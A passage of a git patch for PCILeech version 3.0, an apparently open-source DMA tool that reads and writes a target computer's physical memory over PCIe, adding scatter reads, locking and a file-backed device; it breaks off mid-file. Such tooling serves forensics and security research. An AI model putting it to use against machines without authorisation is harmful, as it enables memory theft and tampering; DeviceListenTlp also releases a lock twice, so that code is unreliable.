From de6ce1f80024b006d04ca53af1bd7c8db2393a80 Mon Sep 17 00:00:00 2001
From: ufrisk <github_ufrisk@frizk.net>
Date: Mon, 12 Mar 2018 13:07:43 +0100
Subject: [PATCH] Version 3.0

---
 pcileech/Android.mk               |    2 +-
 pcileech/Makefile                 |    2 +-
 pcileech/device.c                 |  305 +++--
 pcileech/device.h                 |   16 +-
 pcileech/device3380.c             |    4 +-
 pcileech/device605_tcp.c          |    8 +-
 pcileech/devicefile.c             |   86 ++
 pcileech/devicefile.h             |   17 +
 pcileech/devicefpga.c             |  225 +--
 pcileech/executor.c               |    2 +-
 pcileech/extra.c                  |  369 ++---
 pcileech/extra.h                  |    8 +-
 pcileech/help.c                   | 1012 +++++++-------
 pcileech/kmd.c                    | 2112 +++++++++++++++--------------
 pcileech/oscompatibility.h        |   14 +-
 pcileech/pcileech.c               |  583 ++++----
 pcileech/pcileech.h               |  352 ++---
 pcileech/pcileech.vcxproj         |    8 +
 pcileech/pcileech.vcxproj.filters |   24 +
 pcileech/tlp.c                    |  321 +++--
 pcileech/tlp.h                    |   24 +-
 pcileech/util.c                   | 1164 ++++++++--------
 pcileech/util.h                   |   18 +-
 pcileech/vfs.c                    | 1659 +++++++++++-----------
 pcileech/vfs.h                    |   20 +
 pcileech/vmm.c                    |  895 ++++++++++++
 pcileech/vmm.h                    |  300 ++++
 pcileech/vmmproc.c                |  917 +++++++++++++
 pcileech/vmmproc.h                |   38 +
 pcileech/vmmvfs.c                 |  334 +++++
 pcileech/vmmvfs.h                 |   57 +
 pcileech_files/pcileech           |  Bin 164360 -> 173248 bytes
 pcileech_files/pcileech.exe       |  Bin 306688 -> 355840 bytes
 readme.md                         |   95 +-
 34 files changed, 7047 insertions(+), 3944 deletions(-)
 create mode 100644 pcileech/devicefile.c
 create mode 100644 pcileech/devicefile.h
 create mode 100644 pcileech/vmm.c
 create mode 100644 pcileech/vmm.h
 create mode 100644 pcileech/vmmproc.c
 create mode 100644 pcileech/vmmproc.h
 create mode 100644 pcileech/vmmvfs.c
 create mode 100644 pcileech/vmmvfs.h

diff --git a/pcileech/Android.mk b/pcileech/Android.mk
index 18ee256..df905b4 100644
--- a/pcileech/Android.mk
+++ b/pcileech/Android.mk
@@ -14,7 +14,7 @@ LOCAL_CFLAGS := -D ANDROID
 LOCAL_LDLIBS := -L$(LOCAL_PATH)/lib -llog -g
 
 LOCAL_C_INCLUDES := bionic
-LOCAL_SRC_FILES:= pcileech.c oscompatibility.c device.c device3380.c devicefpga.c device605_tcp.c executor.c extra.c help.c kmd.c memdump.c mempatch.c statistics.c tlp.c util.c vfs.c
+LOCAL_SRC_FILES:= pcileech.c oscompatibility.c device.c device3380.c devicefile.c devicefpga.c device605_tcp.c executor.c extra.c help.c kmd.c memdump.c mempatch.c statistics.c tlp.c util.c vfs.c vmm.c vmmproc.c
 
 LOCAL_MODULE := pcileech
 LOCAL_SHARED_LIBRARIES += libusb1.0
diff --git a/pcileech/Makefile b/pcileech/Makefile
index bd01240..e9b0a83 100644
--- a/pcileech/Makefile
+++ b/pcileech/Makefile
@@ -1,7 +1,7 @@
 CC=gcc
 CFLAGS=-I. -D LINUX -pthread `pkg-config libusb-1.0 --libs --cflags`
 DEPS = pcileech.h
-OBJ = pcileech oscompatibility.o pcileech.o device.o device3380.o devicefpga.o device605_tcp.o executor.o extra.o help.o kmd.o memdump.o mempatch.o statistics.o tlp.o util.o vfs.o
+OBJ = pcileech oscompatibility.o pcileech.o device.o device3380.o devicefile.o devicefpga.o device605_tcp.o executor.o extra.o help.o kmd.o memdump.o mempatch.o statistics.o tlp.o util.o vfs.o vmm.o vmmproc.o
 
 %.o: %.c $(DEPS)
 	$(CC) -c -o $@ $< $(CFLAGS)
diff --git a/pcileech/device.c b/pcileech/device.c
index 36ee6bb..281aa4e 100644
--- a/pcileech/device.c
+++ b/pcileech/device.c
@@ -7,178 +7,229 @@
 #include "kmd.h"
 #include "statistics.h"
 #include "device3380.h"
+#include "devicefile.h"
 #include "devicefpga.h"
 #include "device605_tcp.h"
 
-typedef struct tdREAD_DMA_EX_MEMORY_MAP {
-	BOOL fProbeExecuted;
-	QWORD qwAddrBase;
-	DWORD cPages;
-	PBYTE pb;
-} READ_DMA_EX_MEMORY_MAP, *PREAD_DMA_EX_MEMORY_MAP;
-
 BOOL DeviceReadDMA(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwAddr, _Out_ PBYTE pb, _In_ DWORD cb, _In_ QWORD flags)
 {
-	if(flags & PCILEECH_MEM_FLAG_RETRYONFAIL) {
-		return DeviceReadDMA(ctx, qwAddr, pb, cb, 0) || DeviceReadDMA(ctx, qwAddr, pb, cb, 0);
-	}
-	return ctx->cfg->dev.pfnReadDMA ? ctx->cfg->dev.pfnReadDMA(ctx, qwAddr, pb, cb) : FALSE;
+    BOOL result;
+    DMA_IO_SCATTER_HEADER pDMAs[0x30], *ppDMAs[0x30];
+    DWORD cDMAs, cDMAsSuccess, o;
+    // 1: Prefer scatter DMA (if existing)
+    if(ctx->cfg->dev.pfnReadScatterDMA) {
+        if((cb > ctx->cfg->dev.qwAddrMaxNative) || (cb > 0x24000)) { return FALSE; }
+        ZeroMemory(pDMAs, 0x30 * sizeof(DMA_IO_SCATTER_HEADER));
+        for(cDMAs = 0, o = 0; o < cb; cDMAs++, o += 0x1000) {
+            pDMAs[cDMAs].qwA = qwAddr + o;
+            pDMAs[cDMAs].cbMax = min(0x1000, cb - o);
+            pDMAs[cDMAs].pb = pb + o;
+            ppDMAs[cDMAs] = pDMAs + cDMAs;
+        }
+        DeviceReadScatterDMA(ctx, ppDMAs, cDMAs, &cDMAsSuccess);
+        return (cDMAsSuccess == cDMAs);
+    }
+    // 2: Standard DMA
+    if(!ctx->cfg->dev.pfnReadDMA) { return FALSE; }
+    if(flags & PCILEECH_MEM_FLAG_RETRYONFAIL) {
+        return DeviceReadDMA(ctx, qwAddr, pb, cb, 0) || DeviceReadDMA(ctx, qwAddr, pb, cb, 0);
+    }
+    EnterCriticalSection(&ctx->cfg->dev.LockDMA);
+    result = ctx->cfg->dev.pfnReadDMA(ctx, qwAddr, pb, cb);
+    LeaveCriticalSection(&ctx->cfg->dev.LockDMA);
+    return result;
+}
+
+BOOL DeviceReadScatterDMA(_Inout_ PPCILEECH_CONTEXT ctx, _Inout_ PPDMA_IO_SCATTER_HEADER ppDMAs, _In_ DWORD cpDMAs, _Out_opt_ PDWORD pcpDMAsRead)
+{
+    if(!ctx->cfg->dev.pfnReadScatterDMA) { return FALSE; }
+    EnterCriticalSection(&ctx->cfg->dev.LockDMA);
+    ctx->cfg->dev.pfnReadScatterDMA(ctx, ppDMAs, cpDMAs, pcpDMAsRead);
+    LeaveCriticalSection(&ctx->cfg->dev.LockDMA);
+    return TRUE;
 }
 
-BOOL DeviceReadDMAEx_IsMemoryMapOK(_In_ PREAD_DMA_EX_MEMORY_MAP pMemoryMap, _In_ QWORD qwAddr, _In_ DWORD dwSize)
+DWORD DeviceReadDMAEx_DoWork_Scatter(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwAddr, _Out_ PBYTE pb, _In_ DWORD cb, _Inout_opt_ PPAGE_STATISTICS pPageStat)
 {
-	DWORD i;
-	DWORD cPages = (dwSize + 0xfff) / 0x1000;
-	DWORD cPageStart = (DWORD)(((qwAddr + 0xfff) - pMemoryMap->qwAddrBase) / 0x1000);
-	for(i = cPageStart; i < cPageStart + cPages; i++) {
-		if(0 == pMemoryMap->pb[i]) { 
-			return FALSE; 
-		}
-	}
-	return TRUE;
+    PBYTE pbBuffer;
+    PDMA_IO_SCATTER_HEADER pDMAs, *ppDMAs;
+    DWORD i, o, cDMAs, cDMAsRead;
+    cDMAs = cb >> 12;
+    pbBuffer = (PBYTE)LocalAlloc(LMEM_ZEROINIT, cDMAs * (sizeof(PDMA_IO_SCATTER_HEADER) + sizeof(DMA_IO_SCATTER_HEADER)));
+    if(!pbBuffer) { return 0; }
+    ppDMAs = (PDMA_IO_SCATTER_HEADER*)pbBuffer;
+    pDMAs = (PDMA_IO_SCATTER_HEADER)(pbBuffer + cDMAs * sizeof(PDMA_IO_SCATTER_HEADER));
+    for(i = 0, o = 0; i < cDMAs; i++, o += 0x1000) {
+        ppDMAs[i] = pDMAs + i;
+        pDMAs[i].qwA = qwAddr + o;
+        pDMAs[i].cbMax = min(0x1000, cb - o);
+        pDMAs[i].pb = pb + o;
+    }
+    DeviceReadScatterDMA(ctx, ppDMAs, cDMAs, &cDMAsRead);
+    for(i = 0; i < cDMAs; i++) {
+        if(pDMAs[i].cb == 0x1000) {
+            PageStatUpdate(pPageStat, pDMAs[i].qwA + 0x1000, 1, 0);
+        } else {
+            PageStatUpdate(pPageStat, pDMAs[i].qwA + 0x1000, 0, 1);
+            ZeroMemory(pDMAs[i].pb, 0x1000);
+        }
+    }
+    LocalFree(pbBuffer);
+    return cDMAsRead << 12;
 }
 
-#define CHUNK_FAIL_DIVISOR	16
-DWORD DeviceReadDMAEx_DoWork(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwAddr, _Out_ PBYTE pb, _In_ DWORD cb, _Inout_opt_ PPAGE_STATISTICS pPageStat, _In_ DWORD cbMaxSizeIo, _Inout_ PREAD_DMA_EX_MEMORY_MAP pMemoryMap, _In_ QWORD flags)
+#define CHUNK_FAIL_DIVISOR    16
+DWORD DeviceReadDMAEx_DoWork(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwAddr, _Out_ PBYTE pb, _In_ DWORD cb, _Inout_opt_ PPAGE_STATISTICS pPageStat, _In_ DWORD cbMaxSizeIo, _In_ QWORD flags)
 {
-	DWORD cbRd, cbRdOff;
-	DWORD cbChunk, cChunkTotal, cChunkSuccess = 0;
-	DWORD i, cbSuccess = 0;
-	BOOL result;
-	// calculate current chunk sizes
-	cbChunk = ~0xfff & min(cb, cbMaxSizeIo);
-	cbChunk = (cbChunk > 0x3000) ? cbChunk : 0x1000;
-	cChunkTotal = (cb / cbChunk) + ((cb % cbChunk) ? 1 : 0);
-	// try read memory
-	memset(pb, 0, cb);
-	for(i = 0; i < cChunkTotal; i++) {
-		cbRdOff = i * cbChunk;
-		cbRd = ((i == cChunkTotal - 1) && (cb % cbChunk)) ? (cb % cbChunk) : cbChunk; // (last chunk may be smaller)
-		result =
-			DeviceReadDMAEx_IsMemoryMapOK(pMemoryMap, qwAddr + cbRdOff, cbRd) &&
-			DeviceReadDMA(ctx, qwAddr + cbRdOff, pb + cbRdOff, cbRd, 0);
-		if(!result && !pMemoryMap->fProbeExecuted && ctx->cfg->dev.pfnProbeDMA) { // probe memory on 1st fail (if supported)
-            memset(pMemoryMap->pb, 0, pMemoryMap->cPages);
-			DeviceProbeDMA(ctx, pMemoryMap->qwAddrBase, pMemoryMap->cPages, pMemoryMap->pb);
-			pMemoryMap->fProbeExecuted = TRUE;
-		}
-		if(result) {
-			cbSuccess += cbRd;
-			PageStatUpdate(pPageStat, qwAddr + cbRdOff + cbRd, cbRd / 0x1000, 0);
-		} else if(flags & PCILEECH_FLAG_MEM_EX_FASTFAIL) {
-			PageStatUpdate(pPageStat, qwAddr + cb, 0, (cb - cbRdOff) / 0x1000);
-			return cbSuccess;
-		} else if(cbRd == 0x1000) {
-			ZeroMemory(pb + cbRdOff, cbRd);
-			PageStatUpdate(pPageStat, qwAddr + cbRdOff + cbRd, 0, 1);
-		} else {
-			cbSuccess += DeviceReadDMAEx_DoWork(ctx, qwAddr + cbRdOff, pb + cbRdOff, cbRd, pPageStat, cbRd / CHUNK_FAIL_DIVISOR, pMemoryMap, flags);
-		}
-	}
-	return cbSuccess;
+    DWORD cbRd, cbRdOff;
+    DWORD cbChunk, cChunkTotal, cChunkSuccess = 0;
+    DWORD i, cbSuccess = 0;
+    BOOL result;
+    // calculate current chunk sizes
+    cbChunk = ~0xfff & min(cb, cbMaxSizeIo);
+    cbChunk = (cbChunk > 0x3000) ? cbChunk : 0x1000;
+    cChunkTotal = (cb / cbChunk) + ((cb % cbChunk) ? 1 : 0);
+    // try read memory
+    memset(pb, 0, cb);
+    for(i = 0; i < cChunkTotal; i++) {
+        cbRdOff = i * cbChunk;
+        cbRd = ((i == cChunkTotal - 1) && (cb % cbChunk)) ? (cb % cbChunk) : cbChunk; // (last chunk may be smaller)
+        if(ctx->cfg->dev.fScatterReadSupported) {
+            // scatter read, if available
+            cbSuccess = DeviceReadDMAEx_DoWork_Scatter(ctx, qwAddr + cbRdOff, pb + cbRdOff, cbRd, pPageStat);
+        } else {
+            // traditional read
+            result = DeviceReadDMA(ctx, qwAddr + cbRdOff, pb + cbRdOff, cbRd, 0);
+            if(result) {
+                cbSuccess += cbRd;
+                PageStatUpdate(pPageStat, qwAddr + cbRdOff + cbRd, cbRd / 0x1000, 0);
+            } else if(flags & PCILEECH_FLAG_MEM_EX_FASTFAIL) {
+                PageStatUpdate(pPageStat, qwAddr + cb, 0, (cb - cbRdOff) / 0x1000);
+                return cbSuccess;
+            } else if(cbRd == 0x1000) {
+                ZeroMemory(pb + cbRdOff, cbRd);
+                PageStatUpdate(pPageStat, qwAddr + cbRdOff + cbRd, 0, 1);
+            } else {
+                cbSuccess += DeviceReadDMAEx_DoWork(ctx, qwAddr + cbRdOff, pb + cbRdOff, cbRd, pPageStat, cbRd / CHUNK_FAIL_DIVISOR, flags);
+            }
+        }
+    }
+    return cbSuccess;
 }
 
 DWORD DeviceReadDMAEx(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwAddr, _Out_ PBYTE pb, _In_ DWORD cb, _Inout_opt_ PPAGE_STATISTICS pPageStat, _In_ QWORD flags)
 {
-	READ_DMA_EX_MEMORY_MAP oMemoryMap;
-	BYTE pbWorkaround[4096];
-	DWORD cbDataRead;
-	// set probe memory map to all mem readable
-	oMemoryMap.fProbeExecuted = FALSE;
-	oMemoryMap.qwAddrBase = qwAddr & ~0xfff;
-	oMemoryMap.cPages = (cb + 0xfff) / 0x1000;
-	oMemoryMap.pb = LocalAlloc(0, oMemoryMap.cPages);
-	if(!oMemoryMap.pb) { return 0; }
-	memset(oMemoryMap.pb, 0x01, oMemoryMap.cPages);
-	// read memory (with strange workaround for 1-page reads...)
-	if(cb != 0x1000) {
-		cbDataRead = DeviceReadDMAEx_DoWork(ctx, qwAddr, pb, cb, pPageStat, (DWORD)ctx->cfg->qwMaxSizeDmaIo, &oMemoryMap, flags);
-	} else { 
-		// why is this working ??? if not here console is screwed up... (threading issue?)
-		cbDataRead = DeviceReadDMAEx_DoWork(ctx, qwAddr, pbWorkaround, 0x1000, pPageStat, (DWORD)ctx->cfg->qwMaxSizeDmaIo, &oMemoryMap, flags);
-		memcpy(pb, pbWorkaround, 0x1000);
-	}
-	LocalFree(oMemoryMap.pb);
-	return cbDataRead;
+    BYTE pbWorkaround[4096];
+    DWORD cbDataRead;
+    // read memory (with strange workaround for 1-page reads...)
+    if(cb != 0x1000) {
+        cbDataRead = DeviceReadDMAEx_DoWork(ctx, qwAddr, pb, cb, pPageStat, (DWORD)ctx->cfg->qwMaxSizeDmaIo, flags);
+    } else { 
+        // why is this working ??? if not here console is screwed up... (threading issue?)
+        cbDataRead = DeviceReadDMAEx_DoWork(ctx, qwAddr, pbWorkaround, 0x1000, pPageStat, (DWORD)ctx->cfg->qwMaxSizeDmaIo, flags);
+        memcpy(pb, pbWorkaround, 0x1000);
+    }
+    return cbDataRead;
 }
 
 BOOL DeviceWriteDMA(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwAddr, _In_ PBYTE pb, _In_ DWORD cb, _In_ QWORD flags)
 {
-	PBYTE pbV;
-	BOOL result = FALSE;
-	if(flags & PCILEECH_MEM_FLAG_RETRYONFAIL) {
-		return DeviceWriteDMA(ctx, qwAddr, pb, cb, 0) || DeviceWriteDMA(ctx, qwAddr, pb, cb, 0);
-	}
-	result = ctx->cfg->dev.pfnWriteDMA ? ctx->cfg->dev.pfnWriteDMA(ctx, qwAddr, pb, cb) : FALSE;
-	if(!result) { return FALSE; }
-	if(flags & PCILEECH_MEM_FLAG_VERIFYWRITE) {
-		pbV = LocalAlloc(0, cb + 0x2000);
-		if(!pbV) { return FALSE; }
-		result =
-			DeviceReadDMA(ctx, qwAddr & ~0xfff, pbV, (cb + 0xfff + (qwAddr & 0xfff)) & ~0xfff, flags) &&
-			(0 == memcmp(pb, pbV + (qwAddr & 0xfff), cb));
-		LocalFree(pbV);
-	}
-	return result;
+    PBYTE pbV;
+    BOOL result = FALSE;
+    if(!ctx->cfg->dev.pfnWriteDMA) { return FALSE; }
+    if(flags & PCILEECH_MEM_FLAG_RETRYONFAIL) {
+        return DeviceWriteDMA(ctx, qwAddr, pb, cb, 0) || DeviceWriteDMA(ctx, qwAddr, pb, cb, 0);
+    }
+    EnterCriticalSection(&ctx->cfg->dev.LockDMA);
+    result = ctx->cfg->dev.pfnWriteDMA(ctx, qwAddr, pb, cb);
+    LeaveCriticalSection(&ctx->cfg->dev.LockDMA);
+    if(!result) { return FALSE; }
+    if(flags & PCILEECH_MEM_FLAG_VERIFYWRITE) {
+        pbV = LocalAlloc(0, cb + 0x2000);
+        if(!pbV) { return FALSE; }
+        result =
+            DeviceReadDMA(ctx, qwAddr & ~0xfff, pbV, (cb + 0xfff + (qwAddr & 0xfff)) & ~0xfff, flags) &&
+            (0 == memcmp(pb, pbV + (qwAddr & 0xfff), cb));
+        LocalFree(pbV);
+    }
+    return result;
 }
 
 BOOL DeviceProbeDMA(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwAddr, _In_ DWORD cPages, _Inout_ __bcount(cPages) PBYTE pbResultMap)
 {
-	if(!ctx->cfg->dev.pfnProbeDMA) { return FALSE; }
-	ctx->cfg->dev.pfnProbeDMA(ctx, qwAddr, cPages, pbResultMap);
-	return TRUE;
+    if(!ctx->cfg->dev.pfnProbeDMA) { return FALSE; }
+    EnterCriticalSection(&ctx->cfg->dev.LockDMA);
+    ctx->cfg->dev.pfnProbeDMA(ctx, qwAddr, cPages, pbResultMap);
+    LeaveCriticalSection(&ctx->cfg->dev.LockDMA);
+    return TRUE;
 }
 
 BOOL DeviceWriteTlp(_Inout_ PPCILEECH_CONTEXT ctx, _In_ PBYTE pb, _In_ DWORD cb)
 {
-	if(!ctx->cfg->dev.pfnWriteTlp) { return FALSE; }
-	return ctx->cfg->dev.pfnWriteTlp(ctx, pb, cb);
+    BOOL result;
+    if(!ctx->cfg->dev.pfnWriteTlp) { return FALSE; }
+    EnterCriticalSection(&ctx->cfg->dev.LockDMA);
+    result = ctx->cfg->dev.pfnWriteTlp(ctx, pb, cb);
+    LeaveCriticalSection(&ctx->cfg->dev.LockDMA);
+    return result;
 }
 
 BOOL DeviceListenTlp(_Inout_ PPCILEECH_CONTEXT ctx, _In_ DWORD dwTime)
 {
-	if(!ctx->cfg->dev.pfnListenTlp) { return FALSE; }
-	return ctx->cfg->dev.pfnListenTlp(ctx, dwTime);
+    BOOL result;
+    if(!ctx->cfg->dev.pfnListenTlp) { return FALSE; }
+    LeaveCriticalSection(&ctx->cfg->dev.LockDMA);
+    result = ctx->cfg->dev.pfnListenTlp(ctx, dwTime);
+    LeaveCriticalSection(&ctx->cfg->dev.LockDMA);
+    return result;
 }
 
 VOID DeviceClose(_Inout_ PPCILEECH_CONTEXT ctx)
 {
-	if(ctx->hDevice && ctx->cfg->dev.pfnClose) {
-		ctx->cfg->dev.pfnClose(ctx);
-	}
+    if(ctx->hDevice && ctx->cfg->dev.pfnClose) {
+        DeleteCriticalSection(&ctx->cfg->dev.LockDMA);
+        ctx->cfg->dev.pfnClose(ctx);
+    }
 }
 
 BOOL DeviceOpen(_Inout_ PPCILEECH_CONTEXT ctx)
 {
-	BOOL result = FALSE;
-	if(PCILEECH_DEVICE_USB3380 == ctx->cfg->dev.tp || PCILEECH_DEVICE_NA == ctx->cfg->dev.tp) {
-		result = Device3380_Open(ctx);
-	}
-	if(PCILEECH_DEVICE_FPGA == ctx->cfg->dev.tp || PCILEECH_DEVICE_NA == ctx->cfg->dev.tp) {
-		result = DeviceFPGA_Open(ctx);
-	}
-	if(PCILEECH_DEVICE_SP605_TCP == ctx->cfg->dev.tp) {
-		result = Device605_TCP_Open(ctx);
-	}
-	return result;
+    BOOL result = FALSE;
+    if(PCILEECH_DEVICE_USB3380 == ctx->cfg->dev.tp || PCILEECH_DEVICE_NA == ctx->cfg->dev.tp) {
+        result = Device3380_Open(ctx);
+    }
+    if(PCILEECH_DEVICE_FPGA == ctx->cfg->dev.tp || PCILEECH_DEVICE_NA == ctx->cfg->dev.tp) {
+        result = DeviceFPGA_Open(ctx);
+    }
+    if(PCILEECH_DEVICE_SP605_TCP == ctx->cfg->dev.tp) {
+        result = Device605_TCP_Open(ctx);
+    }
+    if(PCILEECH_DEVICE_FILE == ctx->cfg->dev.tp) {
+        result = DeviceFile_Open(ctx);
+    }
+    if(result) {
+        ctx->cfg->dev.fScatterReadSupported = (ctx->cfg->dev.pfnReadScatterDMA != NULL);
+        InitializeCriticalSection(&ctx->cfg->dev.LockDMA);
+    }
+    return result;
 }
 
 BOOL DeviceWriteMEM(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwAddr, _In_ PBYTE pb, _In_ DWORD cb, _In_ QWORD flags)
 {
-	if(ctx->phKMD) {
-		return KMDWriteMemory(ctx, qwAddr, pb, cb);
-	} else {
-		return DeviceWriteDMA(ctx, qwAddr, pb, cb, flags);
-	}
+    if(ctx->phKMD) {
+        return KMDWriteMemory(ctx, qwAddr, pb, cb);
+    } else {
+        return DeviceWriteDMA(ctx, qwAddr, pb, cb, flags);
+    }
 }
 
 BOOL DeviceReadMEM(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwAddr, _Out_ PBYTE pb, _In_ DWORD cb, _In_ QWORD flags)
 {
-	if(ctx->phKMD) {
-		return KMDReadMemory(ctx, qwAddr, pb, cb);
-	} else if(flags || cb == 0x1000) {
-		return DeviceReadDMA(ctx, qwAddr, pb, cb, flags);
-	} else {
-		return cb == DeviceReadDMAEx(ctx, qwAddr, pb, cb, NULL, 0);
-	}
+    if(ctx->phKMD) {
+        return KMDReadMemory(ctx, qwAddr, pb, cb);
+    } else if(flags || cb == 0x1000) {
+        return DeviceReadDMA(ctx, qwAddr, pb, cb, flags);
+    } else {
+        return cb == DeviceReadDMAEx(ctx, qwAddr, pb, cb, NULL, 0);
+    }
 }
diff --git a/pcileech/device.h b/pcileech/device.h
index 13a586f..e7fa2c8 100644
--- a/pcileech/device.h
+++ b/pcileech/device.h
@@ -1,6 +1,6 @@
 // device.h : definitions related to the hardware devices.
 //
-// (c) Ulf Frisk, 2016, 2017
+// (c) Ulf Frisk, 2016-2018
 // Author: Ulf Frisk, pcileech@frizk.net
 //
 #ifndef __DEVICE_H__
@@ -53,6 +53,20 @@ BOOL DeviceReadDMA(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwAddr, _Out_ PBYTE
 */
 DWORD DeviceReadDMAEx(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwAddr, _Out_ PBYTE pb, _In_ DWORD cb, _Inout_opt_ PPAGE_STATISTICS pPageStat, _In_ QWORD flags);
 
+/*
+* Read memory in various non-contigious locations specified by the items in the
+* phDMAs array. Result for each unit of work will be given individually. No upper
+* limit of number of items to read, but no performance boost will be given if
+* above hardware limit. Max size of each unit of work is one 4k page (4096 bytes).
+* -- ctx
+* -- ppDMAs = array of scatter read headers.
+* -- cpDMAs = count of ppDMAs.
+* -- pcpDMAsRead = optional count of number of successfully read ppDMAs.
+* -- return = TRUE if function is available, FALSE if not supported by hardware.
+*
+*/
+BOOL DeviceReadScatterDMA(_Inout_ PPCILEECH_CONTEXT ctx, _Inout_ PPDMA_IO_SCATTER_HEADER ppDMAs, _In_ DWORD cpDMAs, _Out_opt_ PDWORD pcpDMAsRead);
+
 /*
 * Write data to the target system using DMA.
 * -- ctx
diff --git a/pcileech/device3380.c b/pcileech/device3380.c
index be6f16b..763a588 100644
--- a/pcileech/device3380.c
+++ b/pcileech/device3380.c
@@ -406,9 +406,9 @@ BOOL Device3380_Open(_Inout_ PPCILEECH_CONTEXT ctx)
 		Device3380_ReadCsr((PDEVICE_DATA)ctx->hDevice, REG_USBSTAT, &dwReg, CSR_CONFIGSPACE_MEMM | CSR_BYTEALL);
 	}
 	if(dwReg & 0xc0 /* Full-Speed(USB1)|High-Speed(USB2) */) {
-		printf("Device Info: USB330 running at USB2 speed.\n");
+		printf("Device Info: USB3380 running at USB2 speed.\n");
 	} else if(ctx->cfg->fVerbose) {
-		printf("Device Info: USB330 running at USB3 speed.\n");
+		printf("Device Info: USB3380 running at USB3 speed.\n");
 	}
 	if(ctx->cfg->fVerbose) { printf("Device Info: USB3380.\n"); }
 	// set callback functions and fix up config
diff --git a/pcileech/device605_tcp.c b/pcileech/device605_tcp.c
index fff9dc9..7a805e7 100644
--- a/pcileech/device605_tcp.c
+++ b/pcileech/device605_tcp.c
@@ -1,6 +1,6 @@
 // device605_tcp.c : implementation related to the Xilinx SP605 dev board flashed with @d_olex bitstream.
 //
-// (c) Ulf Frisk & @d_olex, 2017
+// (c) Ulf Frisk & @d_olex, 2017-2018
 //
 #ifdef WIN32
 
@@ -84,7 +84,7 @@ typedef struct tdDEVICE_CONTEXT_SP605_TCP {
 		DWORD cb;
 		DWORD cbMax;
 	} txbuf;	
-	BOOL(*hRxTlpCallbackFn)(_Inout_ PTLP_CALLBACK_BUF_MRd pBufferMrd, _In_ PBYTE pb, _In_ DWORD cb, _In_opt_ HANDLE hEventCompleted);
+	VOID(*hRxTlpCallbackFn)(_Inout_ PTLP_CALLBACK_BUF_MRd pBufferMrd, _In_ PBYTE pb, _In_ DWORD cb);
 } DEVICE_CONTEXT_SP605_TCP, *PDEVICE_CONTEXT_SP605_TCP;
 
 //-------------------------------------------------------------------------------
@@ -215,7 +215,7 @@ VOID Device605_TCP_RxTlpSynchronous(_In_ PDEVICE_CONTEXT_SP605_TCP ctx)
 					TLP_Print(pbTlp, cdwTlp << 2, FALSE);
 				}
 				if (ctx->hRxTlpCallbackFn) {
-					ctx->hRxTlpCallbackFn(ctx->pMRdBuffer, pbTlp, cdwTlp << 2, NULL);
+					ctx->hRxTlpCallbackFn(ctx->pMRdBuffer, pbTlp, cdwTlp << 2);
 				}
 			} else {
 				fprintf(stderr, "WARNING: BAD PCIe TLP RECEIVED! THIS SHOULD NOT HAPPEN!\n");
@@ -456,7 +456,7 @@ BOOL Device605_TCP_Open(_Inout_ PPCILEECH_CONTEXT ctxPcileech)
 	ctx->txbuf.cbMax = SP605_TCP_MAX_SIZE_TX + 0x10000;
 	ctx->txbuf.pb = LocalAlloc(0, ctx->txbuf.cbMax);
 	if (!ctx->txbuf.pb) { goto fail; }
-	ctx->isPrintTlp = ctxPcileech->cfg->fVerboseExtra;
+	ctx->isPrintTlp = ctxPcileech->cfg->fVerboseExtraTlp;
 	// set callback functions and fix up config
 	ctxPcileech->cfg->dev.tp = PCILEECH_DEVICE_SP605_TCP;
 	ctxPcileech->cfg->dev.qwMaxSizeDmaIo = 0x1e000;
diff --git a/pcileech/devicefile.c b/pcileech/devicefile.c
new file mode 100644
index 0000000..64a71b2
--- /dev/null
+++ b/pcileech/devicefile.c
@@ -0,0 +1,86 @@
+// devicefile.c : implementation related to dummy device backed by a file.
+//
+// (c) Ulf Frisk, 2018
+// Author: Ulf Frisk, pcileech@frizk.net
+//
+#include "devicefile.h"
+#include "util.h"
+
+typedef struct tdDEVICE_CONTEXT_FILE {
+    FILE *pFile;
+    QWORD cbFile;
+    LPSTR szFileName;
+} DEVICE_CONTEXT_FILE, *PDEVICE_CONTEXT_FILE;
+
+VOID DeviceFile_ReadScatterDMA(_Inout_ PPCILEECH_CONTEXT ctx, _Inout_ PPDMA_IO_SCATTER_HEADER ppDMAs, _In_ DWORD cpDMAs, _Out_opt_ PDWORD pchDMAsRead)
+{
+    PDEVICE_CONTEXT_FILE ctxFile = (PDEVICE_CONTEXT_FILE)ctx->hDevice;
+    DWORD i, cbToRead, c = 0;
+    PDMA_IO_SCATTER_HEADER pDMA;
+    for(i = 0; i < cpDMAs; i++) {
+        pDMA = ppDMAs[i];
+        if(pDMA->qwA >= ctxFile->cbFile) { continue; }
+        cbToRead = (DWORD)min(pDMA->cb, ctxFile->cbFile - pDMA->qwA);
+        if(pDMA->qwA != _ftelli64(ctxFile->pFile)) {
+            if(_fseeki64(ctxFile->pFile, pDMA->qwA, SEEK_SET)) { continue; }
+        }
+        pDMA->cb = (DWORD)fread(pDMA->pb, 1, pDMA->cbMax, ctxFile->pFile);
+        if(ctx->cfg->fVerboseExtraTlp) {
+            printf("devicefile.c!DeviceFile_ReadScatterDMA: READ: file=%s offset=%016llx req_len=%08x rsp_len=%08x\n", ctxFile->szFileName, pDMA->qwA, pDMA->cbMax, pDMA->cb);
+            Util_PrintHexAscii(pDMA->pb, pDMA->cb, 0);
+        }
+        c += (ppDMAs[i]->cb >= ppDMAs[i]->cbMax) ? 1 : 0;
+    }
+    if(pchDMAsRead) {
+        *pchDMAsRead = c;
+    }
+}
+
+VOID DeviceFile_ProbeDMA(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwAddr, _In_ DWORD cPages, _Inout_ __bcount(cPages) PBYTE pbResultMap)
+{
+    PDEVICE_CONTEXT_FILE ctxFile = (PDEVICE_CONTEXT_FILE)ctx->hDevice;
+    QWORD i;
+    for(i = 0; i < cPages; i++) {
+        pbResultMap[i] = ((qwAddr + (i << 12)) < ctxFile->cbFile) ? 1 : 0;
+    }
+}
+
+VOID DeviceFile_Close(_Inout_ PPCILEECH_CONTEXT ctx)
+{
